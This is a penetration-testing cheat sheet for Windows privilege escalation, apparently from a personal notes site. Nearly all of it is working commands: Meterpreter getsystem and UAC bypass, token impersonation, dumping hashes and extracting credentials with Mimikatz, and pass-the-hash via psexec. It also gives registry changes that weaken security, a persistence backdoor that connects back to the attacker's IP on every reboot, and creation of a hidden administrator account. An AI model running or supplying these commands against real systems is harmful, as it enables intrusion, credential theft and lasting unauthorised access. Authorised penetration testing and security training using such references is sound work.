Search

Privilege Escalation

Table of Content

Windows

With a Meterpreter Shell

getsystem
Automatically try to privesc
run post/windows/gather/win_privs
Enumerate privileges and system infos
bypassuac
Bypass UAC (Might work better to run this before getsystem)

Incognito (lateral Windows privesc)

Incognito is an extension built for lateral Windows privesc

use incognito
Load the Incognito extension
list_tokens -u
List available users to impersonate
impersonate_token $USER
Impersonate a user

Unquoted Service Paths

See 

use exploit/windows/local/trusted_service_path
Automatically exploit unquoted service paths
show options
run

Dumping hashes

hashdump
Dump the password hashes

If the command fails, migrate to another process, then rerun the command.

Pass the Hash

This will only work if we use an administrator account

use exploit/windows/smb/psexec
Performs a pass the hash attack on the machine itself using either a password or a hash
show options
run

If the command fails with Exploit failed [no-access], in powershell, run

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

and rerun the exploit.

Mimikatz

Note that Mimikatz works without errors when the meterpreter shell is attached to a 64-bit process.

ps -A x86_64 -s
List 64-bit processes
migrate $PID
Migrate to a process ID
load mimikatz
Load the mimikatz extension
wdigest
Try to extract credentials

Enable RDP

run getgui -e
Enable RDP

If the user is not allowed to connect via RDP, run (in a windows shell)

net localgroup "Remote Desktop Users" $USER /add
Add a user to the Remote Desktop Users group
rdesktop $IP -u $USER -p $PASSWORD
Connect to the machine via RDP

Connect-back Backdoors

This will generate a connect back backdoor (reverse shell but the other way around) that will try to connect to our machine at every reboot.

persistence -A -X -i 5 -p 8080 -r $OUR_IP
Start a connect back backdoor, start a handler on our machine, start the agent on boot, try to reconnect every 5s, connect to our machine on port 8080

To get back the reverse shell, simply start a handler on port 8080

run exploit/multi/handler

Without a Meterpreter Shell

List running processes

net start
List started services

Unquoted Service Paths

This vulnerability happens when a service is configured with a path to a binary which is unquoted and contains spaces.

In that case, Windows looks for the binary in this order:

  1. C:\Program.exe
  2. C:\Program Files (x86)\Author\Program.exe
  3. C:\Program Files (x86)\Author\Program\SETEVENT.exe

That way, we can write a reverse shell and name it as C:\Program.exe or as C:\Program Files (x86)\Author\Program.exe. This executable would be launched when the service starts, rather than the original executable.

wmic services get name,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows//" |findstr /i /v """
List all unquoted service paths

DLL search order

When a program is launched, the DLL search order is, generally:

  1. The directory of the executable
  2. C:\Windows\System32
  3. C:\windows\system
  4. C:\windows
  5. The current directory when the executable was launched
  6. All directories in the PATH environment variable

Connect to RDP using a NTLM Hash

xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP

Create a new user

net user $USER $PASSWORD /add
Create a new user
net localgroup "Administrators" $USER /add
Add the user to the Administrators group

Linux